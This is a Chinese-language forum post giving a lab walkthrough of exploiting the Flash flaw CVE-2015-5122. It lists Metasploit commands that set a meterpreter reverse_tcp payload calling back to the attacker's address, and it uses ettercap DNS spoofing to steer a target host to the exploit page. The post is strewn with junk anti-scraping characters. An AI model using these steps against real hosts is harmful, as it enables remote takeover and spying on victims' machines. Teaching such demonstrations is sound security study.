找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1426|回复: 0
打印 上一主题 下一主题

cve2015-5122漏洞实例演示虚拟机

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:28:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

, D% m& w, B3 L# T* j$ v 二、cve2015-5122漏洞实例演示虚拟机 ( J: R. v! p3 {! F7 R& ]* G2 |6 B3 D

& ^; S& W' T% f5 R

* f1 h1 n# O' m* t1 V( V   关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ^1 \) T( N. r! o# T. q

/ c8 ?5 c6 s O4 b

5 y1 o7 l5 b+ s# f; i2 x search cve-2015-5122如图: - p8 D" A" ?0 d2 {, G9 L6 ~) k

: O4 }2 P1 \ y

, H! s3 [- r$ |) v2 g   , b2 y& P; i( y" I/ I! b6 _# z( ?

6 C) s2 w3 H8 `1 X

7 m% D3 O. [2 n/ n% Y1 @4 I: D# J 下面我们敲如下命令: 4 s/ v& I# U) D# N5 u& l$ o

" g( S. }, M: ~% u3 h" b2 z

& |# Y1 G( l i use exploit/multi/browser/adobe_flash_opaque_background_uaf * ~: |8 f: G: o7 u1 R/ ~* K

+ p l" E0 i4 d/ v4 E

' C+ K2 A* G8 g# k2 c, w$ t set PAYLOAD windows/meterpreter/reverse_tcp 6 h, t, [5 U3 Z$ D

* P: t( W' f4 w) w) l# I

* F9 z( G9 ~/ A& ^ set LHOST 192.168.0.109 8 o0 G8 N$ f/ X

% X+ A( i. x- t

# p4 {2 m& U! y/ D set URIPATH /                        /*根目录*/ ?' \& s9 D8 j, V$ `) |' q

% C0 i7 {) l8 A

: @ f$ F$ P/ V# f set SRVHOST 192.168.0.109  //192.168.0.109kaili ip地址 / C0 Y! x; S/ ?7 b# T* ^+ R

# X Z. ~# j7 v7 N$ H& P- q

+ ?( H- _/ G) P set SRVPORT 80            /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用 0 m: S; P/ f/ Y0 d

* U& m. i9 W/ O8 Q

- [$ l; l7 L6 D$ F 然后show options如图: 9 e* b5 g# {' B2 ^

0 y4 o6 n- \+ v w, V. u$ \8 N( [

# G; D( c' W0 ^ E3 V   , Z7 m6 s6 o" R2 Z3 ^! G! K! l

+ B$ P& Y; A5 O4 ~, T

: U+ ]8 D4 l& h5 C" @+ ?" D 一切都设置好了,执行exploit下面我们进etc/ettercap目录下设置etc.dns如图:
5 _( Z' k* H% U1 m% B+ c. P
% L4 z5 ]% Q3 J! T' v7 f

) O( D1 q: h' f* |2 X

9 r: n2 W, a, u7 N 然后ettercap -G命令打开ettercap,我们要攻击的主机ip192.168.0115 1 ~3 W! z% ^7 o, @1 r$ }

% s. M$ T0 d1 n% ?; E: ?

# }& I0 B- q+ K Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf # \! P- k9 A# E. }% r

/ O% x7 s: w2 u0 L( r% w4 r+ t

7 e& }# [% P# ^2 K) a7 y/ T, x- r   ) _3 w9 E5 X" z! d9 R! Q2 Z

- _* B3 Q1 {9 m5 O

7 m$ R4 u; L; H, t" E) c; [7 |2 n 成功了,这时候我们断开ettercap,如图: 9 _1 }% ]" ?$ t* l

9 v+ \4 ~% x4 ?5 P- g/ c# A

' C9 X3 K/ j# A, R; v7 Q4 s   7 k9 u* m1 k* D3 W

3 f7 g+ _2 D8 C: t# Z% |% }- l

: ]: d( N" @# w9 l" _ Screenshot如图: 1 z* m6 k0 m! ~' V" R

3 ]2 [& f* Y1 }# D

& j# c7 c6 q5 b$ ^   c! Y3 V/ x3 l6 X2 Z, P

3 Y2 U! B6 ~* B$ R/ B( {( V

4 O) D- k6 f8 ]! C1 V. k & D0 ~. l5 ]1 p5 y& \

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表